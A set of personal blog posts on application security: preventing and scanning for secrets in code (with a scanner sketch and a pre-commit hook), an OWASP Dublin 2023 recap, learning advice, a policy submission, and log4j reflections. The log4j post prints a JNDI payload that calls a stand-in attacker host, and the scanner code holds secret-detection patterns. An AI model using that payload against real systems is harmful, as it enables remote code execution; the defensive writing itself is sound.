Preventing Secrets in Code

Tanya in BC

When I started programming in the ’90s, the security of software wasn’t on everyone’s mind like it is now. I took no security classes in my 3-year college computer science program, and it never even came up as a subject. I was taught to save the connection string for each environment in comments in the code, so it was easier for the next programmer to find them. It wasn’t until 2012 that someone ran a web app scanner (also known as a DAST, a dynamic application security testing tool) on one of my apps. I didn’t understand a word of the report at the time. When I switched from programming to penetration testing, and then on to application security, there was quite a big learning curve for me.

Tanya Janca, in British Columbia, Malahat

Back to the Secrets

Secrets are what computers use to authenticate to other computers. For instance, an application sending a connection string to a database is its way of saying “I am this specific web app, please let me query your database.” When the database connection works, that’s the database’s way of saying “Sure thing!” Computers don’t have eyes, ears, or brains, so they can’t ‘recognize’ someone like humans can; they have to use secrets.

A secret can be a password, an API secret, a certificate, a hash, a connection string, etc. Most importantly: they should not be shared and should only be saved into your secret management tool. But I am getting ahead of myself.

This is a talk I gave in April 2023 at BSides San Francisco, “Hunting Secrets”. Similar topic!

Memories

When we save secrets into our code, it is possible for another programmer to come along and use that secret, for better or for worse. They can log in to your database, connect to your API, or do anything else that the secret can be used for. Sometimes this can seem quite helpful: when I was a programmer, if a client forgot their password, I used to log into the database, grab a copy of their password, use our decryption tool, and tell it to them over the phone. My whole team used to do it. Now I know that it’s more secure to have the user receive a password reset link in their email (to validate they are who they say they are), that the client’s password should have been salted and hashed (a one-way cryptographic method), and that the password to the database should have been kept in a secret management tool (making it unretrievable by human beings). Secrets in our code allow for all sorts of potential attacks, breaches, and embarrassments.

Finding Secrets

If you want to find out if you have secrets in your code, you can use a tool called a secret scanner. There are many on the market, and many of them are free. They use a variety of ways to try to find secrets, but most commonly they use regular expressions (regex) to look for entropy (extremely long, random strings of characters) and keywords (password, secret, key, etc.).
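As a rough illustration of how these tools work, here is a minimal sketch of a scanner in Python. The keyword list, the regex, and the entropy threshold are all simplified assumptions for demonstration; real scanners like gitleaks or truffleHog are far more thorough:

```python
import math
import re

# Keywords that often sit right next to a secret in source code.
KEYWORD_PATTERN = re.compile(
    r'(password|secret|api[_-]?key|key|token)\s*[=:]\s*["\']([^"\']+)["\']',
    re.IGNORECASE,
)

def shannon_entropy(s):
    """Bits of entropy per character; long random strings score high."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum((c / len(s)) * math.log2(c / len(s)) for c in counts.values())

def scan_line(line, entropy_threshold=4.0):
    """Return suspected secrets found in a single line of code."""
    findings = []
    for keyword, value in KEYWORD_PATTERN.findall(line):
        findings.append((keyword.lower(), value))
    # Also flag any long, high-entropy token even without a keyword nearby.
    for token in re.findall(r'[A-Za-z0-9+/=_-]{20,}', line):
        if shannon_entropy(token) > entropy_threshold:
            findings.append(('high-entropy', token))
    return findings
```

Running `scan_line('password = "hunter2"')` flags the keyword match, while a long random blob on its own line gets caught by the entropy check; innocuous code produces no findings.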

When I work somewhere doing AppSec, I try to get read-only access to the code repositories as soon as possible (for many reasons, not just this). Once I have it, I download all the code, from all the projects I can, in a zip. I unzip it, point my secret scanner at it, and then settle in for a few hours to go hunting around in the code. Putting on music and getting a tasty warm beverage (hot chocolate anyone?) can make this a more enjoyable activity. It’s not exactly riveting.

Start by looking at the first finding. Sometimes it’s something really obviously bad, such as:

Password="AliceandBobLearnIsMyFavoriteBook";

That’s a secret for sure! The next step is to rotate that secret: change the password to something new on the system it is used for. Then you check the new secret into your secret management tool (more on this soon), and then (the hard part) you update the code in this application to fetch the secret from your secret management tool instead, and publish the updated code. Do not, under any circumstances, reuse the value you found. That secret has been ‘spoiled’, ‘spilled’, or ‘spilt’. It is no longer usable, as someone malicious might have it saved somewhere, or already be actively using it for malicious purposes.
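To make the “fetch the secret at runtime” step concrete, here is a minimal Python sketch. An environment variable stands in for a call to your secret management tool’s SDK (the name `DB_PASSWORD` is just an example); the point is that the value never appears in the source code or the repository history:

```python
import os

def get_db_password():
    """Fetch the database password at runtime instead of hardcoding it.

    An environment variable stands in here for your secret management
    tool's SDK call; either way, no secret value ever appears in the
    source code or the repository history.
    """
    password = os.environ.get("DB_PASSWORD")
    if password is None:
        raise RuntimeError(
            "DB_PASSWORD is not set; check your secret management configuration"
        )
    return password
```

Failing loudly when the secret is missing (rather than falling back to a default) makes misconfiguration obvious at startup instead of at 3:00 am.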

You are going to need to follow this process for every secret you find. Sometimes it means regenerating a certificate, creating a new API key, etc. It’s a bit of a pain, but it’s a lot better than having a data breach or other type of security incident to deal with.

Special Note: when you find a secret in the code, depending upon what you found, you may want to trigger the incident response (IR) process, to investigate whether this secret has been used improperly. When you find a secret, you can’t know if you were the first, second, or tenth person to find it. Kicking off your IR process is a real-life application of the ‘assume breach’ secure design concept.

Preventing Secrets in the Code

Code repositories (also known as version control, or a ‘repo’) have several types of ‘events’ that can be used to trigger automation. When someone merges their code back into the main branch, you can automatically run tests to verify it integrates nicely. When code is checked in, the repo can prompt someone else to review the changes before they are merged into all the other code. The event we are interested in is called a ‘pre-commit hook’.

The moment someone checks code in that contains a secret, they have spilt it. The secret will be in the history and backups and maybe even in the logs. You must rotate it. Even if you realize your mistake only 5 minutes later, the damage is done.

A pre-commit hook allows you to run your secret scanning tool on only the new or changed code you are checking in; if it finds a secret, it stops the check-in process. It gives the user an error message explaining that it thinks it has found a secret, and blocks the code from being checked in. This means the secret has not been spilt; no secret rotation required! If your code does not have a secret in it, your check-in continues, and any other events you set up do their thing. The test takes so little time that it is almost unnoticeable to the end user.
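Here is what a minimal pre-commit hook might look like as a shell script, saved as `.git/hooks/pre-commit` and made executable. The grep pattern is only a stand-in for a real secret scanner such as gitleaks or detect-secrets:

```shell
#!/bin/sh
# .git/hooks/pre-commit -- blocks the commit when staged changes appear to
# contain a secret. A real setup would call a dedicated scanner (gitleaks,
# detect-secrets, etc.); this grep is a minimal illustration.

# Look only at lines being added in this commit (skip the +++ file headers).
if git diff --cached -U0 | grep -E '^\+[^+]' \
    | grep -qiE '(password|secret|api[_-]?key|token)[[:space:]]*[=:]'; then
    echo "Possible secret detected in staged changes; commit blocked." >&2
    echo "Move the value to your secret management tool, then try again." >&2
    exit 1
fi
exit 0
```

Because the hook only scans the staged diff, it runs in a blink; the developer gets immediate feedback and the secret never enters the repository history.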

Secret Management

Secret Management tools did not exist when I started programming. In fact, they are somewhat ‘new on the scene’ and not widely adopted, yet. Secret management tools manage secrets for machines. They are not password managers, which manage secrets for humans. They are still fantastic though!

When using secret management tools, generally we create a new vault (an instance of encrypted secrets) per system (the application to which those secrets belong). We do this so that if one vault is compromised somehow (perhaps the vault is lost or corrupted), then only one system will be harmed. We also do this to ensure the vault is accessible by whatever system it supports; you wouldn’t want to have to open a hundred holes in your firewall so that all your systems can connect to it.

When we check a secret into a secret management tool, we say goodbye to it forever. We do not keep a copy elsewhere, because we can trust the secret management tool to keep it safe for us. It’s encrypted in the vault, and it is retrieved only programmatically (humans cannot ‘reveal’ the secret in plaintext). Your CI/CD can retrieve it, your application, APIs, etc. This means your secrets are managed in an automated way, leaving zero room for human error. Trust me, it’s a good deal!

Tips

As you follow the process of finding all the secrets, you should take note of false positives, so you can suppress them in the future. An example I ran into myself: there was a license key for a mail merge program, but the company who made the program had gone out of business years ago. This meant that they weren’t breaking any licensing agreement to use it all over the place, and they didn’t need to protect the key because it could be used as many times as they liked. That meant it wasn’t really a secret anymore. We suppressed the license key from then on.

You should create rules to avoid false positives, as it will become annoying over time if you have weird situations like the one mentioned above.

Conclusion

If you work at an organization that has a lot of technical debt, cleaning up all of your secrets can take quite a lot of time. That said, if you have an intern, co-op student, or junior application security person on your team, this is an ideal task for them. It’s lots of work, it’s easy to do, and it looks good on a resume. It also greatly reduces your organization’s risk, which is always a big win.

Happy (secret) hunting!

OWASP Global AppSec Dublin 2023

Tanya Janca Speaking on stage

Recently I had the pleasure of being one of the keynote speakers at OWASP Global AppSec, in Dublin, Ireland. In this post I’m going to give a brief overview of some of the talks I saw while I was there, and the TONS of fun I had. I didn’t get to stay very long, and due to jetlag I fell asleep a few times when I wished I could have stayed awake, but overall I would recommend this event (and all the OWASP Global AppSec events) to anyone who is interested in application security, OWASP, or Guinness beer. This is going to be a long blog post, so get yourself a beverage and get ready for lots of pictures!

I landed the morning before the conference, and met up with two friends I hadn’t seen in far too long, Takaharu Ogasa from Japan, and Vandana Verma from Bangalore India. I also met another speaker for the event named Meghan Jacquot!

Takaharu Ogasa, Tanya Janca, Vandana Verma and Meghan Jacquot!

The evening before the conference I had wanted to set up a We Hack Purple in-person meetup, but I was running short on time. Luckily, my friends at SemGrep invited me to a free pre-conference networking event, so I invited all the WHP folks to meet me there. Unfortunately, WAY too many people were there (the place was supposed to hold 50-100 people, but 200 showed up). Although I got to see many friendly faces (see Jessica Robinson, Vandana and I below), it was far too crowded for me. As a Canadian, we’re used to 13 square kilometres of personal space, per person, and it was a bit much for me. ;-D

Tanya Janca, Vandana Verma and Jessica Robinson

Luckily Adam Shostack invited me to a super-secret-speaker’s dinner the same evening, held in a giant church that had been converted into an amazing live music venue! There were tap dancers, fiddlers, OWASP Board Members, and Adam did an impromptu book signing!!! Thank you Adam! Next to Adam is Avi Douglen of the OWASP Board of Directors, and also an avid threat modeller.

Adam Shostack signing books, with Avi Douglen

The next day I woke up extremely early (6:00 am), thanks to a crying baby in the room next to mine at the hotel. :-/  I used this time to call home and practice my talk: Shifting Security Everywhere. You can download a summary of my presentation here. (Note: you are supposed to join my mailing list to receive the PDF, but my mailing list is awesome, so hopefully you feel it’s a good trade. Also, you can easily get around this if you truly do not want to subscribe, simply do not press the ‘confirm subscription’ link).

Grant Ongers, from the OWASP board of directors, kicked off the conference by announcing a brand-new award “OWASP Distinguished Lifetime Member” and then announced the first 4 winners: Simon Bennetts, Rick Mitchell, Ricardo Pereira, and Jim Manico.  As a person who has volunteered many hours for OWASP, I felt it was beautiful to see 4 extremely dedicated volunteers receive this much-deserved award. I am very proud of all of them and their amazing contributions to our community! Great job OWASP for thinking of this new way to show appreciation by publicly recognizing some of our most-dedicated volunteers!

Grant Ongers presenting award to Simon Bennetts

The very first talk of the conference was called “A Taste of Privacy Threat Modeling” by a woman named Kim Wuyts, introduced by Avi Douglen (Member of OWASP Board of Directors). She spoke about threat modelling privacy, and used ice cream analogies to explain how marketers see our data. I like ice cream, privacy, AND threat modelling, so this was a real treat (pun intended!). I care a lot about privacy, both personally and professionally, and loved how she used situations we are all familiar with (including eating ice cream too fast then ending up with brain freeze!) to explain various concepts within privacy and threat modelling. I feel like any person, with zero previous technical experience or knowledge, would have been able to follow her entire talk, which is quite rare at a conference like this. She also made her OWN threat modelling privacy game! Nicely done Kim!

After that I went to see Chris Romeo’s talk about “Ten DevSecOps Culture Fails”. Chris is also the host of the Application Security podcast, and I’ve been following his work for quite a while. He did not disappoint!

Chris Romeo, speaking

After the delicious lunch of yummy curry and rice, and more than one latte, we had the afternoon keynote. Grant Ongers introduced Jessica Robinson, who explained “Why winning the war in cyber means winning more of the everyday battles”. She shared several personal stories from her career, including what it was like to be a woman of colour working in STEM, her obsession with the Kennedys, implementing the first cyber security policy at a large law firm in New York City, and more! The thing I liked most about her presentation was how she took us on a journey. She’s an incredibly gifted public speaker, and she started by getting us all to close our eyes, then imagine various things, before opening our eyes and formally beginning her talk.

Part way through Jess’ presentation the videographer fainted, fell, and made a huge loud noise. He’s okay, don’t worry readers! All 500 of us turned around and started becoming concerned. She inquired as to whether he was okay, a bunch of staff rushed to take care of him, and once it was clear there was no danger, she recommenced her talk. Not very many speakers would be able to recover like she did. To be able to fully capture our attention again was very impressive. I say this as a person who was a professional entertainer for 17 years, and then a professional public speaker for 6 years; that is an incredible feat. By the end I had completely forgotten about the fainting, because I was so wrapped up in her and the tales she was telling. Anyway, she’s amazing.

Jessica Robinson, being amazing

At this point I have a silly complaint. Usually when I go to an InfoSec conference, there are only a handful of talks that interest me. I always want to see all of the AppSec talks, maybe some quantum computing, anything to do with using AI to create better security, or topics about cyber warfare (which equally interest and frighten me). But it’s rare at a conference that is not AppSec-focused that I have conflicts in the schedule of things that I really want to see. This happened a LOT at this conference. Sometimes there would be 3 different talks, at the same time, that I was dying to see. I found it very difficult to choose for some of the time slots, which may sound strange, but I’m a very decisive person. Not being able to decide is rare for me. That said, I am pleased to report that all of them were recorded, even if we all know it’s not quite as good as being there in person. I will try to add links to all the talks listed here once the videos are out so that you can enjoy them too!

Seba Deleersnyder and Bart De Win

This is my favourite picture from the entire conference. When you work on an open-source project with someone, you are working because you love what you are doing. When everyone on your team really cares about your goal, you can become very good friends. It is very clear the SAMM team are great friends! I love seeing OWASP bring people together! <3

The talk from the image above was about the OWASP SAMM project – The Software Assurance Maturity Model, presented by Seba Deleersnyder and Bart De Win. I live tweeted their talk (link here), if you want a play-by-play. The essence of their presentation was updates about the project from the past 2-3 years, and how they have worked with the community and industry to update, expand, and improve the model to be more helpful, by creating tools, surveys and online documentation to make their project more useful for everyone. I had been planning on writing a blog post about the project called “OWASP SAMM, for the rest of us”, because I find clients are often very insecure that they won’t ‘measure up’ to the SAMM standard. I hope I can help a bit by breaking things down into smaller pieces, and helping teams start where they are at, then working their way up over time. SAMM can work for any team, just be realistic and try not to be too hard on yourself! We all have to start somewhere.  

After Seba and Bart’s talk it was time for the networking event. OBVIOUSLY, they had Guinness beer on tap! We were in Ireland! I had a great time, chatting with all sorts of people, and I got an awesome gift of a Tigger-striped hoodie from Avi Douglen, which made my day! Then I went back to my hotel room to practice my talk, approximately a thousand times.

Tanya Janca, presenting on a stage

Side note: Remember the baby in the hotel room next to mine? The night before my talk it started crying, loudly, at 3:00 AM, and continued crying all the way until 6:00 am. I was up almost the entire night. Which gave me plenty of time to practice my talk. Yay?

Usually when you see me present a ‘new’ talk at a conference, it is not the first time that I have presented it. In fact, I have often given it 5 to 10 times, in front of 1 or 2 people each time, which is why I usually seem so comfortable on stage. I always practice new material on people from my community (We Hack Purple, OWASP Ottawa, the Ottawa Ladies Code Meetup, WoSEC Victoria, etc.). I’ve always turned to my community for feedback, advice, and encouragement. They have always been gentle, kind, and give reliably fantastic advice! I would recommend every speaker do this! But this time, because I was asked to do this with so little time, I hadn’t presented it in front of anyone. In fact, I was still writing it as I flew across the ocean to the venue. I WAS SO NERVOUS!!!!!

Tanya Janca, presenting on stage

But it went really well anyway!  Phew! And Matt Tesauro introduced me, so that was extra-nice! Matt is on the OWASP Board of directors and a leader of the Defect Dojo Project. Actually, he’s been a part of several different projects and chapters over the years. He was kind enough to distribute the maple-candies I brought to give to all the people who asked questions. Having a long-time friend introduce me made me a lot less nervous! Thank you Matt!

Tanya Janca, smiling for the camera

Now that my talk was over, I could concentrate completely on having fun! I ended up in the hallway speaking to lots of people and missing the talk after mine. Then we had lunch, and then came another time slot where there were THREE talks I wanted to see. THREE amazing presentations to choose from! I ended up in Tal Melamed’s talk, about the OWASP Serverless Top Ten. I had spoken to Tal many times before, but it was our first time meeting in person, so that was pretty exciting for me. I even managed to sit with him for lunch! Even though I already knew the Serverless Top Ten, it was still exciting to see Tal speak to it. As a bonus, he ended slightly early, so I was able to catch the Q&A after Matt Tesauro’s talk about Hacking and Defending APIs – Red and Blue make Purple. I felt this was a good compromise.

After lunch the wonderful Vandana Verma got on stage to introduce the last keynote speaker. She told us all that there would be “a BIG announcement” at 5:30 pm, so we had better not leave early. For those that don’t know, the big announcement was that OWASP has officially changed their name (but not the acronym). Previously it stood for ‘Open Web Application Security Project”, but that name was limiting. People often complained that we kept straying outside our purpose, by including cloud, containers, etc. But why would we want to limit ourselves like that? So the board of directors voted to change it to “Open World Wide Application Security Project”, which I have to say, I like WAY BETTER. Nicely done board!

The last keynote was Dr. Magda Chelly, and it was spectacular! In her talk, AI-Assisted Coding: The Future of Software Development; between Challenges and Benefits, she spoke about how AI is going to change the way most of us work, especially those of us in IT. I don’t want to give away the entire talk, but… She explained how many of us could work with AI, the difference between AI-assisted and AI-created content (this is more important than I had previously realized), and all the issues and questions around who owns the copyright of such work. If an AI creates a poem, but you asked it to create a poem, and gave it the parameters to create said poem, who owns the copyright? What if it only assisted you in creating an application, it didn’t write all the code, just some of the code? Who owns that? Also, when we train AI on certain data, but that data has specific licensing, and then the AI creates code that is not licensed in the same way, has the created code broken the license agreement? There was a fascinating discussion during the Q&A, and it definitely has me thinking about such systems in a very new way.

Magda being amazing!

The last talk that I saw at the conference was presented by someone named Adam Berman, and it was called “When is a Vulnerability Not a Vulnerability?”. For those of you who have followed me a long time, you would know that I wrote a blog post with that exact title in 2018 (read it here). My post was about when vulnerabilities are reported to bug bounty programs, but they are not exploitable/do not create business risk, is it really a vulnerability? In it I explored a ‘neutered’ SQL injection attack, and of all the posts I have ever written, it has received by far the most scrutiny.

That said, although there was a similar slant, it was definitely not based off of anything I have written or spoken on. Which made it extra-exciting for me!

Adam works at R2C (who make SemGrep), so all of the research came from them. In April of this year, I will be co-presenting a workshop at RSA with Clint Gibler (of R2C and TL;DR Sec fame) about ‘How to Add SAST to CI/CD, Without Losing Any Friends’ (no link available at this time). We will be using SemGrep to demo all the lessons, so I was extra-curious to see Adam speak!

Brian presenting SemGrep

Adam’s talk was all about traceability in Software Composition Analysis (SCA). A recurring issue when you work in AppSec is developers not having enough time to fix everything we ask them to. We (AppSec folks) are constantly trying to persuade, pressure, demand, and even beg developers to fix the bugs we have reported. One of the most convincing ways to get a developer to fix a bug is by creating an exploit. But that is VERY time consuming! It’s not realistic for us to create a proof-of-concept exploit for every single result that our scanners pick up. Layer on top of this the fact that automated tools tend to report a LOT of false positives, and this leads many developers to question whether they absolutely need to fix something, or if maybe they can put it off until “later”. And by “later” I mean “never”.

If you scan an application with an SCA tool, most of them will tell you if any of the dependencies in your application are ‘known to be vulnerable’. They do this by checking a list of things they know are vulnerable (they create this list in many ways, and Adam covered that, but that part is not the exciting part, you can learn that anywhere). Think of the SCA tool working like this: “Are you using Java Struts version 2.2? Yes? It’s vulnerable! I shall now report this to you as a vulnerability!” But just because the dependency has a vulnerability in it, it doesn’t necessarily mean that your application is vulnerable, and herein lies the problem.
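That lookup step can be sketched in a few lines of Python. The dependency name, version, and advisory ID below are all made up for illustration; real tools pull their advisory data from curated vulnerability databases:

```python
# A toy "known vulnerable versions" table, the core of how an SCA tool
# flags dependencies. The entries here are placeholders, not real data.
KNOWN_VULNERABLE = {
    ("struts", "2.2"): ["CVE-XXXX-YYYY"],  # placeholder advisory ID
}

def check_dependency(name, version):
    """Return the list of advisories for this dependency version, if any."""
    return KNOWN_VULNERABLE.get((name.lower(), version), [])
```

Note that this check says nothing about whether the application actually exercises the vulnerable code, which is exactly the gap Adam’s talk addressed.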

More Brian!

If your application is not calling the function(s) that have the vulnerability in them, then your app shouldn’t be vulnerable (in most cases this is true, there are rare exceptions, specifically Log4J). Previously, SemGrep released a blog post about this (you can read it here), and they claim that approximately 98% of all results from SCA tools are false positives, because the vulnerable function within the dependency is never called from the scanned app. Which means there’s no risk to the business. Which means it’s a false positive. It’s still technical debt, which is not great, but it’s not a great big hole in your defenses, and that’s a very different (and much less scary) problem.
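A toy version of that reachability check might look like this in Python, using the standard library’s ast module. Real tools build full call graphs and handle aliases, imports, and transitive calls; this sketch only spots direct calls by name:

```python
import ast

def calls_function(source_code, function_name):
    """Return True if the given Python source ever calls `function_name`.

    A toy version of the reachability analysis described above: an SCA
    result is far more likely to be a true positive if the application
    actually calls the vulnerable function from the dependency.
    """
    tree = ast.parse(source_code)
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            func = node.func
            # Matches both `vulnerable()` and `lib.vulnerable()` call forms.
            if isinstance(func, ast.Name) and func.id == function_name:
                return True
            if isinstance(func, ast.Attribute) and func.attr == function_name:
                return True
    return False
```

If the vulnerable function name never appears in any call site, the finding is likely one of those 98% false positives: still technical debt, but not an open hole.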

If you’ve been begging developers to update all sorts of dependencies, imagine if you reduced your number of asks by 98%? And you could show them where their app is calling the problematic function? That conversation would likely be a lot less difficult. In fact, I bet the developers would jump to fix it. Because it would be obvious that it’s a real risk to the business.

This is a BIG CLAIM, so I wanted to hear the details in person. And I did!

Moi

Because this was an OWASP event, Adam couldn’t just say “Yo, SemGrep is awesome, buy our stuff”. If he did that, it would also make for a not-very-entertaining-or-believable presentation. Instead, he explained HOW to do this yourself. And just how much work it is. Spoiler alert: it’s a lot of work.

Although I would love to provide the technical details for you, I have to admit that I was almost falling asleep the entire time because of the “absolutely no sleep” situation from the night before with the crying baby. I must have yawned 100 times, and I was more than a little concerned I may have offended the speaker! So I can’t give you the details, but I will post a link here as soon as I have it so you can watch Adam explain. He’s better at explaining it anyway!

Then I went to bed (at 4:00 pm, and I slept all the way until 5:00 am the next day!). After that I headed to the airport, flew home, and wrote this on the plane! I hope you enjoyed my summary of my experience at OWASP Global AppSec 2023, held in Dublin, Ireland, February 14th and 15th, 2023.

– fin –

Tanya on stage

Continuous Learning

Tanya Smiling

Working in the information technology (IT) field means you need to be comfortable with things at work constantly changing and the need to continue to learn as your career grows. Working in information security (InfoSec) means you not only need to keep up with all sorts of IT trends, but also the attacks, defenses, and mitigations for each. When I started learning about DevOps, and how they value continuous learning and ‘taking time to improve your daily work’, I was sold. But I wasn’t quite sure how to go about putting it into practice.

Tanya Janca, in British Columbia, Malahat

When I switched from being a software developer to a penetration tester, and then on to application security, I had a lot to learn. On top of that, I am dyslexic, so the more common ways that people learn don’t always work well for me. Even worse, my training budget for my job in the Canadian Public Service was $2,500 CAD a year (approximately $1,900 USD) and I wasn’t allowed to travel for courses. Living in Ottawa, Canada at the time, there weren’t very many options within my reach.

I started out my security career switch with a professional mentor, but the first one didn’t work out very well. He got frustrated with me quickly, no matter how hard I tried. I found out later that his expectations were near-impossible to meet, and what was asked of me was not very reasonable (nor ethical, at times). Example: he asked me on a Friday to learn pentesting over the weekend, with no help or advice, and then told me to do my first pentest the following Monday, setting me loose on a client’s live production system with zero previous experience. It did not end well, for me or the client. The mentor and I went our separate ways.

By this point I had started joining security communities. And I LOVED it. My favourite community of all the local ones I could find was OWASP, the Open Web Application Security Project. The Ottawa chapter was led by someone named Sherif Koussa, who I am proud to still call my friend and mentor today. I made friends quickly, found more than one new mentor, and even became a chapter leader. I learned a lot by inviting speakers, talking to others in the community, and volunteering for projects.

Eventually I started doing public speaking, which provided me with free tickets to conferences, and sometimes even free training! I also started my own OWASP project (OWASP DevSlop) so that I could learn how to secure software in a DevOps environment.

It became clear to me, very quickly, that I learn best by reading/listening/watching something, then trying it for myself, then teaching it to someone else. I also enjoy learning more when I follow this process, rather than only reading or watching videos. I realize this is way more work than just reading a book, but everyone is different. And I’m lucky because other people seem to like my style of teaching and writing, which motivates me in a way I had never previously known. 😀

Eventually I wrote my own book (Alice and Bob Learn Application Security), started my own tiny Canadian startup (We Hack Purple), and opened my own online academy and community.

But that’s what worked for me. You need to find what works for you.

Below is a long list of ways that you can continue your learning. If you have more ideas, please send them to me and I will add them!

General Advice:

  • Find what you are interested in. Join communities (online and local, if possible) that focus on those topics. Make friends if you can!
  • Finding out what you are interested in might take a lot of time, and that’s okay! It took me 2 years to figure out I wanted to do AppSec, not PenTesting. You need to find the right place for you.
  • If you fear that you are too old to learn, please put that notion aside. You CAN learn. If this belief is holding you back, talk to someone who cares about you, and let them talk you out of it. Everyone has doubts sometimes, people who love you can help you look past them.
  • Find out if there are learning opportunities at work. Sometimes you can job shadow someone or help on certain projects. I kept volunteering to help the security team at my office and eventually they let me join the team!
  • Some organizations offer coaching services to employees. Usually it’s for leadership, but I used to work somewhere as an AppSec coach. I trained up the junior people into AppSec pros; it was great!
  • If your office pays to bring in a trainer, it’s often significantly less costly than sending them all individually to courses. See if you can join forces with other teams, departments, or even other organizations to create a larger budget.
  • Ideally you will aim to learn about best practices that are agnostic in nature, and then also learn about your specific tech stack that you use at work. This could mean a general secure coding course, with a break-out session on your specific programming language, framework, cloud provider, etc.
  • If you are reading this and you are on the security team, planning to train your developers on security for the first time: if anyone seems nervous, you might want to assure them that no one is losing their job. It might sound strange, but sometimes when there’s change, people worry. If you can remove their worries, they will learn more, and hopefully even enjoy it. Watch for this and reassure people if the need arises.
  • If you are planning learning for others, communicate your plan, in advance. Let them know what’s coming. It helps people prepare themselves, and you are likely to get better results.
  • If possible, provide training in multiple formats (audio, visual/diagrams/images, hands on, written, etc.) so that every person’s learning style is accommodated. If you’re not sure how you learn, try a few different ways and see which one “feels right”. That’s likely the best one for you!
  • Give yourself short breaks. A microbreak (5-15 seconds to laugh at a meme or read a few short posts on Mastodon) can help you move information from your short-term memory into long-term memory, meaning you are more likely to be able to apply what you learned, and remember it for significantly longer.
  • Take tests or give yourself tests. Not so that you can see how you measure up against others, but to make yourself remember the things you’ve learned. Practising ‘recall’ will help ensure you’ve learned (not memorized) the new information.
  • Set time aside for yourself each day and slowly watch recorded conference talks and other content that interests you. Consuming information in smaller chunks can make it easier to absorb. If you aren’t sure which videos, books, or articles to start with, ask for suggestions from people in your community.
Tanya Janca, Presenting at B-Sides Ottawa, November 2022. Ottawa, Canada

Application Security Learning Opportunities:

I hope this helps you on your continuous learning journey!

Consulting on Canada’s Approach to Cyber Security

Good job Public Safety!

You may not be aware, but Canada’s Public Safety department put out a call to Canadian citizens (sorry, brilliant people who are not Canadian), asking for ideas, suggestions, and thoughts on what the Canadian Government should prioritize next for InfoSec. I WAS SO EXCITED WHEN I SAW THIS AND WROTE THEM IMMEDIATELY. Obviously I made suggestions about AppSec. You have until August 19, 2022 to send your suggestions. The suggestions that I sent are below.


Hi!

I am responding to calls for suggestions from this link: https://www.publicsafety.gc.ca/cnt/cnslttns/cnsltng-cnd-pprch-cbr-scrt/index-en.aspx  I used to work for the Canadian Public service, and now work in private industry.

  1. I would like to see the Canadian Public Service and Government of Canada focus on ensuring we are creating secure software for the public to use. I want to see formal application security programs (sometimes called a secure system development life cycle or S-SDLC) at every department. I have extensive training materials on this topic that I would be happy to provide for free to help.
  2. I would also like to see government-wide training for all software developers on secure coding, and AppSec training for every person tasked with ensuring the software of their department is secure. When I was in the government (13.5 years), I was never allowed to have security training, because it was too expensive ($7,000 USD for a SANS class was completely out of reach). I was told the government wouldn’t arrange giant classes (say 100 people, splitting the cost of one instructor), because that would be ‘unfair competition with private industry’. You need to fix that; having mostly untrained assets is not a winning strategy. There needs to be a government-wide training initiative to modernize your workforce. (Again, I have free online training that can be accessed here: https://community.wehackpurple.com – join the community (free), then take any courses you want (also free))
  3. Create security policies that apply to all departments, then socialize them (do workshops, create videos, make sure everyone knows – don’t just post them to the TBS website and hope someone notices on their own). A secure coding guideline. An AppSec program/secure SDLC. Incident response, etc. Each department shouldn’t have to start from scratch each time. Then we could standardize the level of security assurance we expect from each department. I provide some of these policies in the AppSec Foundations Level 2 course, which is free via the link above.
  4. Throw away all the old policies and procedures that are just not working. 90-day password rotation? Gone. SA&A process that takes several weeks to complete but doesn’t actually offer much in the way of actionable advice? Gone. Re-evaluate current processes and get rid of the bad ones. We need agile processes that let people get their work done. I felt like many of the processes I had to follow in the government were in place because of a lack of trust in the staff’s competency. Instead of not trusting the staff, train them, then trust them. If they continue to screw up after training, discipline them and eventually get rid of the bad apples. Most of your staff is GOOD. Some of them are truly amazing. Treat them with trust and many of them will astound you. Remove onerous administration that is there because you don’t trust them, then let them get their jobs done.

If you have any questions I would love to talk. Thank you for putting out an open call, I’m super-impressed!

Tanya

Why can’t I get over log4j?


I haven’t written in my personal blog in a while, and I have good reasons (I moved to a new city, the new place will be a farm, I restarted my international travel, something secret that I can’t announce yet, and also did I mention I was a bit busy?). But I still can’t get over log4j (see previous article 1, article 2, and the parody song). The sheer volume of work involved in the response was spectacular (one company estimated 100 weeks of work, completed over the course of 8 days), and the damage caused is still unknown at this point. We will likely never know the true extent of the cost of this vulnerability. And this bugs me.

Photos make blog posts better. People have told me this, repeatedly. Here’s a photo, I look like this.

I met up last month with a bunch of CISOs and incident responders, to discuss the havoc that was this zero-day threat. What follows are stories, tales, facts and fictions, as well as some of my own observations. I know it’s not the perfect storytelling experience you are used to here; bear with me, please.

Short rehash: log4j is a popular Java library used for application logging. A vulnerability was discovered in it that allowed any user to submit a short string of characters (into the address bar, a form field, or anything else that got logged), and if the system was vulnerable, the attacker would gain remote code execution (RCE). No authentication to the system was required, making this one of the simplest attacks of all time to gain the highest possible level of privilege on the victim’s system. In summary: very, very scary.
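As a concrete illustration, the widely reported exploit payload was a Log4j “lookup” expression; anything shaped like the following, if it ended up in a logged message, could trigger a remote JNDI/LDAP fetch (the attacker host here is a placeholder):

```
${jndi:ldap://attacker.example/a}
```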

Most companies had no reason to believe they had been breached, yet they pulled together their entire security team and various other parts of their org to fight against this threat, together. I saw and heard about a lot of teamwork. Many people I spoke to told me they had their security budgets increased by multitudes, being able to hire several extra people and buy new tools. I was told “Never let a good disaster go to waste”. Interesting….

I read several articles from various vendors claiming that they could have prevented log4j from happening in the first place, and for some of them it was true, though for many it was just marketing falsehoods. I find it disappointing that any org would publish an outright lie about the ability of their product, but unfortunately this is still common practice for some companies in our industry.

I happened to be on the front line at the time, doing a 3-month full-time stint (while still running We Hack Purple). I had *just* deployed an SCA tool that confirmed for me that we were okay. Then I found another repo. And another. And another. In the end they were still safe, but finding out there had been 5 repos full of code that I was unaware of as their AppSec Lead made me more than a little uncomfortable, even if it was only my 4th week on the job.

I spoke to more than one individual who told me they didn’t have log4j vulnerabilities because the version they were using was SO OLD they had been spared, and still others who said none of their apps did any logging at all, and thus were also spared. I don’t know about you, but I wouldn’t be bragging about that to anyone…

For the first time ever, I saw customers not only ask if vendors were vulnerable, but they asked “Which version of the patch did you apply?”, “What day did you patch?” and other very specific questions that I had never had to field before.

